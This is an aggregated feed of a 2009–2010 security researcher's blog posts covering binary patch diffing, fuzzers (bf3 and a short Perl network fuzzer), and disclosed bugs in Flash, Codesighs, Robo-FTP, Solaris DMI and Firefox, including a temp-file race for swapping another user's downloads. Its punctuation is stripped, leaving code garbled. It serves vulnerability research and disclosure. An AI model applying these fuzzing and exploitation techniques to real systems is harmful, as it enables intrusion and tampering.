http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2010-05-25 00:54:32 - Jeremy's Computer Security Blog : Nearly every day a security advisory is published for some vendor's product Depending on who publishes the advisories, they may contain few or even no technical details describing what was changed from one version of the software to the next DarunGrim2 is a free binary diffing tool by Jeongwook Oh It uses IDA Database files idb to analyze and compare two binaries and implements several algorithms to improve the overall analysis So if you want to know exactly what issue s were supposedly fixed in the next version of the software, DarunGrim2 can help When you download DarunGrim2 from the website be sure to read the Usage For a brief demonstration, I've given DarunGrim2 two untouched IDBs no variables or functions renamed, etc from two binaries referred to as Original and Patched Original left contains the vulnerability, while patched right includes the fix We see to the far right Match Rate This simply shows what percentage of the function's code from Original to Patched is the same In more complex binaries, if very little code is changed to fix the vulnerability, and no other significant changes were made, the Match Rate should be slightly less than 100pourcents But since this binary is very small, 50pourcents is reasonable for a patch sub_4012E5 is clearly unmatched across Original and Patched, lets check it out Carefully read the disassembly What is the difference ORIGINAL mov eax, ebp arg_0 mov esp ,eax char call strlen -- calls strlen for the argument to the function PATCHED lea eax, ebp var_28 mov esp ,eax char call strlen -- calls strlen for a local variable in the function sub_40132A passes its three arguments, which came from sub_4012E5, to memcpy mov eax, ebp arg_8 mov esp 8 ,eax size_t strlen returns a size_t for memcpy , telling it to copy n bytes from src Earlier, when the strlen for Original was called, it became the size of the src arg_0 to the function But when the strlen for Patched was called, it became the size of the dest var_28 The code looks similar to this for Original memcpy var_28 ,arg_0, strlen arg_0 and something like this for Patched memcpy var_28 ,arg_0, strlen var_28 So, what did they fix A buffer overflow vulnerability In the original, if more data than the local variable can hold is passed via the argument, memory could be corrupted This is patched by using the size of the local variable to dictate the amount data to copy into local variable, instead of using the size of the argument Isn't binary diffing fun http://www.secuobs.com/revue/news/225190.shtmlhttp://www.secuobs.com/revue/news/225190.shtml Secuobs.com : 2010-03-05 05:39:22 - Jeremy's Computer Security Blog - Today, I received this from Adobe PSIRT We are targeting May for the next release of Flash Player, which would include the fix for this issue We will provide more information as we get confirmation of the schedule and any other helpful details Going on 6 months and they still can't seem to check if mkstemp returns -1 I know this isn't really even a security issue, and it costs money to do things like this in business, but really, they could have handled it a lot better I'll go into some detail now I was watching some flash video on Vimeo and then happened to ls my tmp directory Catching my eye was a certain filename or two, with names such as Flash7f9Lk3 and Flashm10PDtY I soon figured out that when viewing flash videos on Firefox with Adobe Flash Player 10 plug-in, as buffered, a copy of the video is downloaded to tmp with the first part of the filename always being Flash and the last part being six random case-sensitive alphanumeric characters a-z 26 A-Z 26 0-9 10 62 62 6 56,800,235,584 So there are 56 billion different filenames that can be chosen in this scheme We see here they use mkstemp to create the temporary files The code looks something like this strcpy filename, tmp FlashXXXXXX i mkstemp filename if i Hmmm They check if mkstemp returns an open file descriptor, but what if it returns -1 Program received signal SIGSEGV, Segmentation fault Switching to Thread 0xb7d1f6d0 LWP 27117 0xaafab279 in from usr lib adobe-flashplugin libflashplayerso gdb i r eax 0x1e 30 ecx 0x76656c5f 1986358367 edx 0xaa80b000 -1434406912 ebx 0xab725210 -1418571248 esp 0xbf8f53e0 0xbf8f53e0 ebp 0xbf8f5408 0xbf8f5408 esi 0xcf79974 217553268 edi 0xcf79958 217553240 eip 0xaafab279 0xaafab279 eflags 0x10206 PF IF RF cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 gdb x i eip 0xaafab279 mov pourcentsecx ,pourcentseax gdb bt 0 0xaafab279 in from usr lib adobe-flashplugin libflashplayerso 1 0xaafab44d in from usr lib adobe-flashplugin libflashplayerso 2 0xab1990a0 in from usr lib adobe-flashplugin libflashplayerso 3 0xab1a2ed5 in from usr lib adobe-flashplugin libflashplayerso 4 0xab1104c0 in from usr lib adobe-flashplugin libflashplayerso 5 0xab1a4f6e in from usr lib adobe-flashplugin libflashplayerso 6 0xaadb4565 in from usr lib adobe-flashplugin libflashplayerso 7 0xaadb7cc3 in from usr lib adobe-flashplugin libflashplayerso 8 0xb77cb3bd in from usr lib xulrunner-19014 libxulso 9 0xb77cc6a0 in from usr lib xulrunner-19014 libxulso 10 0xb77cac57 in from usr lib xulrunner-19014 libxulso 11 0xb77d3004 in from usr lib xulrunner-19014 libxulso 12 0xb77cd1fd in from usr lib xulrunner-19014 libxulso 13 0xb79514d1 in from usr lib xulrunner-19014 libxulso 14 0xb795130a in from usr lib xulrunner-19014 libxulso 15 0xb7275367 in from usr lib xulrunner-19014 libxulso 16 0xb72800c9 in from usr lib xulrunner-19014 libxulso 17 0xb79856c8 in from usr lib xulrunner-19014 libxulso 18 0xb7955fea in from usr lib xulrunner-19014 libxulso 19 0xb78d8eb6 in from usr lib xulrunner-19014 libxulso 20 0xb78c3db8 in from usr lib xulrunner-19014 libxulso 21 0xb6bc7dad in from usr lib libglib-20so0 22 0xb6b90b88 in g_main_context_dispatch from usr lib libglib-20so0 23 0xb6b940eb in from usr lib libglib-20so0 24 0xb6b94268 in g_main_context_iteration from usr lib libglib-20so0 25 0xb67c9634 in gtk_main_iteration from usr lib libgtk-x11-20so0 26 0xaadbab17 in from usr lib adobe-flashplugin libflashplayerso 27 0xb6b912b6 in from usr lib libglib-20so0 28 0xb6b90b88 in g_main_context_dispatch from usr lib libglib-20so0 29 0xb6b940eb in from usr lib libglib-20so0 30 0xb6b94268 in g_main_context_iteration from usr lib libglib-20so0 31 0xb78c39e4 in from usr lib xulrunner-19014 libxulso 32 0xb78d8b58 in from usr lib xulrunner-19014 libxulso 33 0xb78d8cef in from usr lib xulrunner-19014 libxulso 34 0xb798566a in from usr lib xulrunner-19014 libxulso 35 0xb7955f54 in from usr lib xulrunner-19014 libxulso 36 0xb78d8e38 in from usr lib xulrunner-19014 libxulso 37 0xb776d2b4 in from usr lib xulrunner-19014 libxulso 38 0xb71caa8b in XRE_main from usr lib xulrunner-19014 libxulso 39 0x080491ab in 40 0xb7d37775 in __libc_start_main from lib tls i686 cmov libcso6 41 0x08048d11 in gdb EEXIST anyone You don't need to create 56 billion yourself either, just a few million should work fine I contacted Adobe on 09 18 2009, exchanged a few emails, one of interest being Resolving this issue requires some architectural changes that are not appropriate for a security patch Even if its not much of a security issue, but an interesting programming mistake, a local user can still crash anyone else's Firefox process that is using the Adobe Flash plug-in And then they say they want more time Waiting 8 months for them to check the return value of mkstemp is unacceptable Proof of concept That should be easy hint write your own scheme or try looping mkstemp http://www.secuobs.com/revue/news/198263.shtmlhttp://www.secuobs.com/revue/news/198263.shtml Secuobs.com : 2010-02-10 03:18:45 - Jeremy's Computer Security Blog - The target application parses data from an EDS file format We have no sample EDS file, and no idea what the file format looks like But soon you will see by blackbox testing and reverse engineering, we can get all the information we need to correctly produce EDS files and find vulnerabilities First off, lets just throw some data into the file testeds load it into the application and see how it responds From the error message, we can see that it needs the data in 's load data Now we know an EDS file also contains Device and File sections load data Really, how lucky can we get 'VendCode', 'ProdType', 'ProdCode', 'MajRev', 'MinRev' are entries for the Device section and 'Revision' is an entry under File section So far, using blackbox testing we have discovered lots of information about the EDS file format But usually there is more to discover Its time to reverse it ---- Device ---- File Looks like there is another entry for the File section called 'DescText' and we see how to correctly format it in the EDS file A closer look reveals a call to wsprintf on the 'DescText' entry, which can lead to a buffer overflow So, lets use the format to write the entry attach a debugger and see what happens Yeah Hm, we probably didn't expect a unicode buffer overflow How did that happen anyways sub_1000FB50 -- calls sub_10007160 sub_10007160 -- vulnerable function In sub_1000FB50, we see a call to MultiBytetoWideChar maps a character string to a wide-character Unicode string So, in conclusion, we just went from knowing absolutely nothing about the EDS file format to knowing exactly how to build a valid EDS file, the sections and entries it parses, and which ones may be vulnerable for attack http://www.secuobs.com/revue/news/190305.shtmlhttp://www.secuobs.com/revue/news/190305.shtml Secuobs.com : 2010-01-16 18:22:45 - Jeremy's Computer Security Blog - Browser Fuzzer 3, or bf3, is a comprehensive web browser fuzzer Browser Fuzzer 3 is designed as a hybrid framework standalone fuzzer the modules it uses are extendable but also highly integrated into the core bf3 can be used via command line to set all necessary flags for each fuzzing operation After initialization, bf3 creates test cases in a numbered system Fuzzing is automated through the browser using the refresh method If error is detected, server logs can provide insight to the offending test case Fuzzes CSS, DOM, HTML, JavaScript and XML Attended and Unattended Fuzzing Modes 7th Generation Fuzzing Oracle Random Data Generator Mutation Fuzzing Engine USAGE bf3 -Z -X fileext -x extrahtml -P www INFO -T Fuzzing Oracle -D Modules Available -M target module -A attended fuzzing mode dom js only -U unattended fuzzing mode -O use the fuzzing oracle -R use random generation -Z max number of bytes random generation -X file to parse for mutation -x extra file for mutation css xml only -P test case output directory full path -T list fuzzing oracle -D list modules available Modules Available 1 Cascading Style Sheets CSS 2 Document Object Model DOM 3 HyperText Markup Language HTML 4 JavaScript JS 5 Extensible Markup Language XML Example Usage Fuzz JavaScript in Unattended Mode with the Fuzzing Oracle and output test cases to var www bf3 -M 3 -U -O -P var www Fuzz DOM in Attended Mode with Random Data up to 10,000 bytes and output 10,000 test cases to var www dom bf3 -M 2 -A -R 10000 -Z 10000 -P var www dom Fuzz CSS by mutating filecss with Random Data up to 100,000 bytes default and use filehtml to display the data, output to var www cssm total number of test cases 100 x number of characters in filecss bf3 -M 1 -U -R 100 -X home linux bf3 samples css stylecss -x home linux bf3 samples css bmgsechtml -P www css Fuzz JavaScript in Unattended Mode by generating 1,000,000 random test cases and output to var www js bf3 -M 4 -U -R 1000000 -P var www js Fuzz XML in Unattended Mode with Random data and output 100,000 test cases to var www xml bf3 -M 5 -U -R 100000 -P var www xml If you notice an anomaly in the target while processing test cases and you have access to the logs at the server which is hosting them, you can do this to figure out which one you need to save and further research fuzz linux grep -i chrome var log apache2 accesslog tail -1 10101111 - - 09 Jan 2010 09 54 54 -0500 GET xml1 xml334761html HTTP 11 200 756 http 10101110 xml1 xml334760html Mozilla 50 Windows U Windows NT 51 en-US AppleWebKit 5320 KHTML, like Gecko Chrome 3019538 Safari 5320 Misc Notes Attended mode fuzzes things that may need attention a click of the mouse, etc like JS alert and prompt During all fuzzing generation except mutation, -R of test cases During mutation, of test cases is -R x number of characters in the target file Make sure you remove any data that would conflict with the automated fuzzing process in the extra file when using mutation When mutation fuzzing XML, you must make sure the xml variable's name is Document Please replace the var in the extra file with Document to make things work correctly This could be the first project to go from C bf to PERL bf2 and back to C again bf3 Krakow Labs Development for binary, source code, demonstration video and more http://www.secuobs.com/revue/news/182420.shtmlhttp://www.secuobs.com/revue/news/182420.shtml Secuobs.com : 2009-12-15 01:09:32 - Jeremy's Computer Security Blog - Fuzzing is targeting input and delivering data that is handled by a target with the intent of finding bugs usr bin perl use IO Socket use String Random while 1 sock IO Socket INET-new Proto tcp , PeerHost localhost , PeerPort 4444 or die connection failed rand new String Random random rand-randpattern x rand 100 r n r n sock-send random close sock A simple, protocol-less, remote fuzzer in only 11 lines of Perl It works by connecting to the host on a specified port, via TCP or UDP, and sending random lengths of random characters in an infinite loop until the service stops responding With bare modification, this code can check for many types of vulnerabilities in just about any server that accepts input A few more lines could add a user interface, specifications for more target input, logging functionality, and more http://www.secuobs.com/revue/news/171898.shtmlhttp://www.secuobs.com/revue/news/171898.shtml Secuobs.com : 2009-12-12 09:53:01 - Jeremy's Computer Security Blog - I reported a memory corruption vulnerability in Mozilla Codesighs, a set of tools to help you determine the code and data size of shared libraries and executables Once you can measure the code and data size, then you can measure drifts in size as code changes occur Mozilla Codesighs is included as third party in Google's Chrome dev pkg , Google's Gadget for Linux, and probably others I didn't expect them to jump right on it since its not for Firefox or Thunderbird, but I did figure they'd let me know that they would get around to it eventually this is a debugging tool used in specific situations, to read as input output generated by other programs So even if it crashes in response to some other input, I don't see how that's a vulnerability This tool is not designed to handle arbitrary input, nor does it need to be Seems like Mozilla is not interested int codesighs Options inOptions Output a simplistic report based on our options int retval 0 char lineBuffer 0x500 int scanRes 0 unsigned long size char segClass 0x10 char scope 0x10 char module 0x100 char segment 0x40 char object 0x100 char symbol SizeStats overall ModuleStats modules NULL unsigned moduleCount 0 memset overall, 0, sizeof overall Read the file line by line, regardless of number of fields We assume tab seperated value formatting, at least 7 lead values size class scope module segment object symbol while 0 retval NULL fgets lineBuffer, sizeof lineBuffer , inOptions-mInput trimWhite lineBuffer scanRes sscanf lineBuffer, pourcentsx tpourcentss tpourcentss tpourcentss tpourcentss tpourcentss t , unsigned size, segClass, scope, module, segment, object The vulnerability is introduced in the sscanf call, where the developer's code dangerously copies data in buffers without a width specifier, allowing us to overflow 5 different buffers Some technical details via GDB 257 while 0 retval NULL fgets lineBuffer, sizeof lineBuffer , inOptions-mInput gdb 259 trimWhite lineBuffer gdb trimWhite inString 0xbfffd310 1 tCODE t , 'A' , t , 'A' times, t , 'A' , t , 'A' at codesighsc 213 213 int len strlen inString gdb 215 while len gdb 217 len-- gdb 219 if isspace inString len gdb 221 inString len ' 0' gdb 215 while len gdb 217 len-- gdb 219 if isspace inString len gdb 228 gdb codesighs inOptions 0xbffff350 at codesighsc 261 261 scanRes sscanf lineBuffer, gdb i r eax 0x0 0 ecx 0xb7fe468c -1208072564 edx 0x82 130 ebx 0x9d8ff4 10326004 esp 0xbfffd040 0xbfffd040 ebp 0xbffff328 0xbffff328 esi 0x0 0 edi 0x0 0 eip 0x8048945 0x8048945 eflags 0x246 PF ZF IF cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 gdb s 270 if 6 scanRes gdb i r eax 0x6 6 ecx 0x414141 4276545 edx 0x0 0 ebx 0x9d8ff4 10326004 esp 0xbfffd040 0xbfffd040 ebp 0xbffff328 0xbffff328 esi 0x0 0 edi 0x0 0 eip 0x804899d 0x804899d eflags 0x282 SF IF cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 gdb An attacker could give someone a file to parse with Codesighs and it will corrupt memory with the possibility of executing code on the their system That is in fact a vulnerability ONE DAY after I filed the bug report, they unmarked it as a security issue So I guess they wouldn't mind if I blogged about it and let others investigate with this code http://www.secuobs.com/revue/news/171312.shtmlhttp://www.secuobs.com/revue/news/171312.shtml Secuobs.com : 2009-12-08 23:51:22 - Jeremy's Computer Security Blog - Back in September, I finished a presentation I planned on submitting for SecurityTubeCon titled From Static Analysis to 0day Exploit But SecurityTubeCon never happened So, there I was with a full 20 minute presentation and no conference to show it But after some twittering and skypeing, Marcus from DojoSec decided to pick it up, and it worked out Big thanks to Marcus and DojoSec Abstract This presentation features a great static analysis tool called Klocwork Insight Static analysis is the analysis of either source or object code from a project This project could be software or firmware, binary or source Static anaylsis is performed without actually executing the code, it just gets analyzed Klocwork Insight is a source code analysis suite that is used to audit source code of projects written in C, C , C , and even Java It is used to detect security and quality issues by analyzing the project's source code for bugs By the end of the video, you will have learned how to use Klocwork Insight to find vulnerabilities in software and also preview a live 0day exploit in the target audited software Click here for the full presentation I also released a small 0day to go along with the presentation http://www.secuobs.com/revue/news/169886.shtmlhttp://www.secuobs.com/revue/news/169886.shtml Secuobs.com : 2009-11-21 01:29:07 - Jeremy's Computer Security Blog - Around 10 months ago, I was fuzzing with my ftp client fuzzer unreleased I came across Robo-FTP, which provides client and server solutions for FTP The Robo-FTP Product Suite The most powerful, secure and flexible tool for automated file transfers and related workflow management At least they're marketing people did a good job So after I explored the software a little bit, I decided to start fuzzing I saved the server login information on Robo-FTP and started the fuzzer listening on port 2121 Logon In the console box I see 220 and just stops there I hit Exit and it took me back to the main application I clicked on Tools again, but I couldn't Run FTP Client Applet anymore Thats weird Then I exited Robo-FTP Robo-FTPexe The instruction at 0x7C9102F6 referenced memory at 0x41414140 The memory could not be read 0x7C9102F6 - 0x41414140 I contacted Robo-FTP about this vulnerability and they said something to the effect of 'they would look into it' and they appreciated my concern I haven't heard anything from them since A few days ago, I started thinking about this bug again and wondered if they ever fixed it After checking their website I seen the latest version 3617 had been released November 2nd I downloaded the new version, ran the fuzzer and connected again The bug was never fixed Not that this is surprising to me, but it may be to others that use and rely on this product http://www.secuobs.com/revue/news/163656.shtmlhttp://www.secuobs.com/revue/news/163656.shtml Secuobs.com : 2009-10-28 22:36:46 - Jeremy's Computer Security Blog - A video demonstrating exploitation of this vulnerability is available here Now for the technical details When downloading files through Firefox and choosing the Open with option, Firefox will create a temporary file in the form of RANDOMpart RANDOM is random alphanumeric characters and part is the extension When the download completes, Firefox saves the completed file in the tmp directory as its original filename and opens it with the program's handler for example, Ark for compressed archives, VLC for mp3, WINE for exe, etc Now, what if there is already a file with an identical filename in the temporary file directory Firefox uses the scheme of saving and opening the completed download as tmp file- zip , where file is the file's name, - is a dash and the next available number in order, and zip is of course the file's extension So if tmp filezip already exists and the user tries to download a file with the same name, Firefox saves and opens the newly downloaded file as tmp file-1zip That scheme looked suspicious to me, and raised a couple good questions 1 What is the maximum number in the filename 2 What happens when it reaches that maximum number Testing has proved that 9999, for example tmp file-9999zip , is the maximum number Firefox will use to deal with identical Open with filenames Instead of using tmp file-10000zip , Firefox will just use the original identical file instead of the one it was supposed to download and open That can get dangerous when local users can write to tmp just like everybody else To exploit this situation, we need to know the filename that will be downloaded ahead of time Then it is just a matter of creating the excess files, placing our replacement file with the identical filename in tmp , and waiting for the target user to use the Open with option to download a file A file of our choosing will appear in the download history as a ghost pointer , one mozilla guy noted If the file doesn't automatically open as most testing shows , then the average user is going to simply double click on the pointer in history anyways, opening our replacement file We wouldn't even nessesarily have to know ahead of time According to how long it would take to complete the download remember Firefox is writing to tmp RANDOMpart until its finished downloading , we could do our business while the file is still downloading again, as long as we know its filename There are many scenarios where we could leverage this vulnerability here is one example Administrator is downloading openssh-52targz We run the exploit to replace openssh-52targz with a modified version Administrator installs our OpenSSH 52 with our _modifications_ The download history will still show the name of the site that supplied the original file and the original filename even when the target user opened the our replacement file instead Conditions that have to be met for exploitation to succeed 1 The ability to write in the temporary file directory, tmp by default on Linux shell, ftp, etc with write permissions could be helpful for making this work remotely 2 The target user chooses to download the file and chooses the Open with preference 3 The target user also has to double click the file in the download manager in previous testing, if I recall correctly, the file opened automatically, as normal behavior but that can no longer be confirmed Firefox on Windows has slightly different results I found during testing that when the download completes, the right file will be opened Although unreliable, we were able to get the history of the file in download manager to show the replacement file and it will be opened if the user chooses to open it from there Exploitation on Windows would be limited anyways due to the fact that you don't usually see as much remote access to do local things on Windows as its fairly common on Linux On Linux it is also common for the replacement file to be kept in history when using this exploit, which can be useful for helping play off the exploit when you don't want the target to think anything much is out of the ordinary mozilla-191 xpcom io nsLocalFileCommoncpp - LINES 85-174 NS_IMETHODIMP nsLocalFile CreateUnique PRUint32 type, PRUint32 attributes nsresult rv PRBool longName ifdef XP_WIN nsAutoString pathName, leafName, rootName, suffix rv GetPath pathName else nsCAutoString pathName, leafName, rootName, suffix rv GetNativePath pathName endif if NS_FAILED rv return rv longName pathNameLength kMaxSequenceNumberLength kMaxFilenameLength if longName rv Create type, attributes if rv NS_ERROR_FILE_ALREADY_EXISTS return rv ifdef XP_WIN rv GetLeafName leafName if NS_FAILED rv return rv const PRInt32 lastDot leafNameRFindChar PRUnichar '' else rv GetNativeLeafName leafName if NS_FAILED rv return rv const PRInt32 lastDot leafNameRFindChar '' endif if lastDot kNotFound rootName leafName else suffix Substring leafName, lastDot include '' rootName Substring leafName, 0, lastDot strip suffix and dot if longName PRUint32 maxRootLength kMaxFilenameLength - pathNameLength - leafNameLength - suffixLength - kMaxSequenceNumberLength ifdef XP_WIN ensure that we don't cut the name in mid-UTF16-character rootNameSetLength NS_IS_LOW_SURROGATE rootName maxRootLength maxRootLength - 1 maxRootLength SetLeafName rootName suffix else if NS_IsNativeUTF8 ensure that we don't cut the name in mid-UTF8-character while UTF8traits isInSeq rootName maxRootLength --maxRootLength rootNameSetLength maxRootLength SetNativeLeafName rootName suffix endif nsresult rv Create type, attributes if rv NS_ERROR_FILE_ALREADY_EXISTS return rv for int indx 1 indx 10000 indx start with Picture-1jpg after Picturejpg exists ifdef XP_WIN SetLeafName rootName NS_ConvertASCIItoUTF16 nsPrintfCString -pourcentsd , indx suffix else SetNativeLeafName rootName nsPrintfCString -pourcentsd , indx suffix endif rv Create type, attributes if NS_SUCCEEDED rv rv NS_ERROR_FILE_ALREADY_EXISTS return rv The disk is full, sort of return NS_ERROR_FILE_TOO_BIG That codes gives us a good look at how the scheme works I tested the Save As option and it doesn't seem to be vulnerable it saved, for example, file 1000000 zip Yes, the header is roughly 3 times as many lines as the actual exploit code, but hey, this bug has a lot of details and ideas but is also very simple to exploit linux ubuntu getunique right zip home linux Desktop wrongzip target downloads rightzip and opens it the same filename, but with wrongzip's contents Muy Bueno Thunderbird doesn't seems to respond by not responding to the open when running the exploit This code looks like its shared across Mozilla's codebase, so other applications like the SeaMonkey suite may be vulnerable as well Mozilla also seems handle certain file types like targz and tarbz2 differently, see the code for more information you may even have to double click the file's entry in download manager if Firefox doesn't automatically open it One way or another, though, this vulnerability is decently reliable, on Linux at least Mozilla has released updates fixing this vulnerability Full exploit code will be made public soon IMAGE http://www.secuobs.com/revue/news/155000.shtmlhttp://www.secuobs.com/revue/news/155000.shtml Secuobs.com : 2009-09-26 00:56:13 - Jeremy's Computer Security Blog - Anyone scanning a Sun Solaris box for RPC services can usually expect a number of them to be running and available Some of the services such as status or rquotad are well documented and well known, so researching their purpose and functions is trivial But writing client operations for some programs can be easier than others, such as DMI DMI stands for Desktop Management Interface, a specification to establish a framework that handles communication between management software and managed components DMI can be used locally or remotely through RPC and is mappable to other management protocols such as SNMP DMI has four components 1 MIF Management Information Format Describes management information 2 SP Service Provider Connects the management software and managed components 3 CI Component Interface API to enable a component to be managed 4 MI Management Interface API to manage components A couple of RPC services that employ DMI on Solaris are dmispd and snmpXdmid For a description of dmispd, I will quote from its manpages The DMI Service Provider, dmispd, is the core of the DMI solution Management applications and Component instrumentations communicate with each other through the Service Provider The Service Provider coordinates and arbitrates requests from the management application to the specified component instrumentations The Service Provider handles runtime management of the Component Interface CI and the Management Interface MI , including component installation, registration at the MI and CI level, request serialization and synchronization, event handling for CI, and general flow control and housekeeping And the same for snmpXdmid The snmpXdmid utility is a subagent in the Solstice Enterprise Agent Desktop Management Interface package It maps the SNMP requests forwarded by the Master Agent snmpdx 1M into one or more equivalent DMI requests Further, it remaps the DMI response into SNMP response back to snmpdx When I was writing modules for dmispd snmpXdmid in my RPC fuzzer, I couldn't find much documentation, so I had gather information for various resources and put it all together I'd like to thank open source developers for their code that was so helpful too Researching the protocols and using the information I found enabled me to write the modules and fuzz dmispd snmpXdmid dmispd program number 300598 dmispd program version 1 dmispd procedures REGISTER 512 UNREGISTER 513 GETVERSION 514 GETCONFIG 515 SETCONFIG 516 LISTCOMPONENTS 517 LISTCOMPONENTSBYCLASS 518 LISTLANGUAGES 519 LISTCLASSNAMES 520 LISTGROUPS 521 LISTATTRIBUTES 522 ADDROW 523 DELETEROW 524 GETMULTIPLE 525 SETMULTIPLE 526 ADDCOMPONENT 527 ADDLANGUAGE 528 ADDGROUP 529 DELETECOMPONENT 530 DELETELANGUAGE 531 DELETEGROUP 532 GETATTRIBUTE 533 SETATTRIBUTE 534 Rather odd procedure call numbers They are usually lower ranges like 1-5, etc snmpXdmid program number 100249 snmpXdmid program version 1 snmpXdmid procedures DELIVEREVENT 256 ADDCOMPONENT 257 UNKNOWN 258 UNKNOWN 259 UNKNOWN 260 UNKNOWN 261 UNKNOWN 262 UNKNOWN 263 UNKNOWN procedures are those which I couldn't find names During fuzzing, I found an issue that is reproducable in both dmispd and snmpXdmid allowing a remote user to consume resources on the whole system By calling ADDROW and sending data in a loop or not, doesn't matter to dmispd causes the process to consume resources and temporarily freeze the system DELETEROW and DELETELANGUAGE also have the same issue You can check out camisadoc if you are interested SnmpXdmid also suffers from the same issue with ADDCOMPONENT and all the other procedures that are valid and I have tested If you'd like to test snmpXdmid just reuse the code for dmispd This issue is nothing special, but I figure the code and research could help others that are interested in DMI, RPC, and security Plus I like seeing code do unexpected or unintended things If you happen to see any errors or have more information on DMI and DMI related research, I would appreciate if you would let me know I try to make sure all information is as accurate as possible, but mistakes can happen from time to time IMAGE http://www.secuobs.com/revue/news/144634.shtmlhttp://www.secuobs.com/revue/news/144634.shtml Secuobs.com : 2009-09-09 09:42:27 - Jeremy's Computer Security Blog - Lots of things have been going on and I'm gonna do a quick update on my blog now I released 3 new exploits on 09072009 Ipswitch WS_FTP 12 Professional Remote Format String 0day PoC nocoolnameforawsftppocpl I actually got a non-robotic, insightful vendor response We saw your post regarding this vulnerability and wanted to thank you for bringing it to our attention We have been able to reproduce the issue and have identified a fix Our Ipswitch File Transfer Division policy is to notify the first reporting company via email , then after fixing, give mention to you in the Release Notes when the patch is released You mention in your post that you tried to find a resource at Ipswitch Can you tell me who you tried, so we can be more responsive in the future Sent in response Thanks for fixing the issue, please link me to the release notes when the updates are publically issued I attempted to go through the support procedure, but the process seemed vague when trying to report a security issue Like most other vendors that make security a top priority, a security contact email is issued and make publically available along with a team dedicated to fixing and responding to emails about security issues And then I got Thanks for your response I can see where the standard support procedure would seem vague for this purpose I did find out today that we have a security ipswitchcom email that is monitored We'll need to do a better job of publicizing it I'll let you know when we have a release for the fix GemStone S 631 stoned Local Buffer Overflow Exploit wonderfulcaricatureofexploitabilityc Which is a good example of beating Linux's ASLR implementation as discussed in a previous post Safari 323 Win32 'eval' Remote Denial of Service Exploit letsgosurfinnowonsafaripl This is a bug that was in Krakow Lab's Fun Archive for a while and was fixed in Safari 4 I just released 4f, The File Format Fuzzing Framework at the Krakow Labs website today, you should check it out, and if you want to write modules for it there is a section explaining just how to do it You can also check out the video graciously hosted by SecurityTube a GREAT site if you'd like to see 4f in action Also, I am working with Mozilla on a vulnerability that affects Firefox 2x and 3x, currently tested up to 36a1 and allows users to tamper with other users downloads You can check out the video here and I will be releasing exploit code as soon as updates fixing the issue are provided IMAGE http://www.secuobs.com/revue/news/139073.shtmlhttp://www.secuobs.com/revue/news/139073.shtml Secuobs.com : 2009-08-04 22:29:24 - Jeremy's Computer Security Blog - AniWeather is a very popular add-on for both Mozilla Firefox and Google's Chrome While looking at its configuration page one day, I realized that there wasn't much protecting AniWeather's configuration To configure AniWeather, it uses this page hosted at the AniWeather website I copied the page and ran it as a local file it worked the same Just keep it the same filename - aniweatherconfig2html AniWeather was just checking if the filename was the same, allowing anyone to host the file that does configuration, possibly with other intentions such as onload configuration changes to take effect when a target user visits the webpage, etc Not a huge vulnerability, but configuration files should be protected at all times, especially from untrusted remote hosts Kudos to the team at AniWeather, they provided a decent fix that checks the hostname and makes sure the configuration page that interacts with the add-on comes from the trusted source Just watch out for DNS attacks now heh Thanks for reporting the vulnerability I have upgraded the add-on and forced the host name checking AniWeather uses a configuration page mainly to be compatible w Google Chrome browser so that both browsers share identical experience Since these days updating add-ons in mozillaorg takes forever, you can get the latest version 069 directly from wwwaniweathercom In fact, if you are a US user, you can also enjoy a rich set of graphic reports including hi-res radar in the new version Let me know if you have any further questions or comments Thanks again and have a nice day It actually took them less than 2 hours to respond and upgrade AniWeather now if other vendors could be so efficient IMAGE http://www.secuobs.com/revue/news/127943.shtmlhttp://www.secuobs.com/revue/news/127943.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - There is an interesting bugtraq article that iSEC has released as an advisory for Adobe Flash and Air From the original post iSEC applied targeted fuzzing to the ActionScript 2 virtual machine used by the Adobe Flash player, and identified several issues which could lead to denial of service, information disclosure or code execution when parsing a malicious SWF file The majority of testing occurred during 120 hours of automated SWF-specific fault injection testing in which several hundred unique control paths were identified that trigger bugs and or potential vulnerabilities in the Adobe Flash Player Paths leading to duplicate issues where condensed down to a number of unique problems in the Adobe Flash Player The primary cause for these vulnerabilities appears to be simple failures in verifying the bounds of compartmentalized structures So, iSEC used a SWF fuzzer and found lots of bugs, including DoS, information disclosure, and code execution Nice But now it looks like and I assume the fuzz strings oracle is strong most of the SWF bugs are laid to rest Bah humbug AND ITS NOT EVEN CHRISTMAS YET And 120 hours these guys weren't just determined, but also I bet they implemented a good system of spawning processes and catching faults Good stuff But, I have to say, I respect the level of security these guys play at Lots of goodies been coming from iSEC and this was a good read Bug on IMAGE http://www.secuobs.com/revue/news/122407.shtmlhttp://www.secuobs.com/revue/news/122407.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I have released two new papers, both like the previous two, are exploitation demonstrations Local and remote examples are provided for exploiting on our host os Linux Format String Exploitation here Frame Pointer Overwrite here The format string paper goes through exploiting dtors and overwriting GOT entries, and some people may not realize the opportunities that present themselves when one is unable to control the instruction pointer EIP , but only the frame pointer EBP , which can lead to control over the EIP Then its game over I hope everyone had a good break for the holidays, mine has been going pretty well I have been working on my JPEG fuzzer, and so far it has went from BETA to ALPHA testing stages FINAL shouldn't be too far down the road, so stay tuned If anyone is interested, there is a good SCADA mailing list that may be worth subscribing too For more information, check it out here IMAGE http://www.secuobs.com/revue/news/122406.shtmlhttp://www.secuobs.com/revue/news/122406.shtml Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I have released a couple fuzzers recently, 'just for fun' They are RSH and VNC Fuzzers Check them out here here, respectively Also something interesting that I just came across test ubuntu clamscan -V ClamAV 0941 8713 Tue Dec 2 14 59 31 2008 From http securitytrackercom alerts 2008 Dec 1021296html Version s prior to 0942 Description A vulnerability was reported in Clam AntiVirus A remote user can cause denial of service conditions on the target system A remote user can create a specially crafted JPEG file that, when processed by the target system, will trigger a stack overflow and cause the Clam AntiVirus process to crash Ilja van Sprundel reported this vulnerability Impact A remote user can create a JPEG file that, when processed by the target application, will cause the target application to crash Solution The vendor has issued a fixed version 0942 The vendor's advisory is available at http sourceforgenet project shownotesphp group_id 86638 release_id 643134 Also reference https wwwsclamavnet bugzilla show_bugcgi id 1266 test 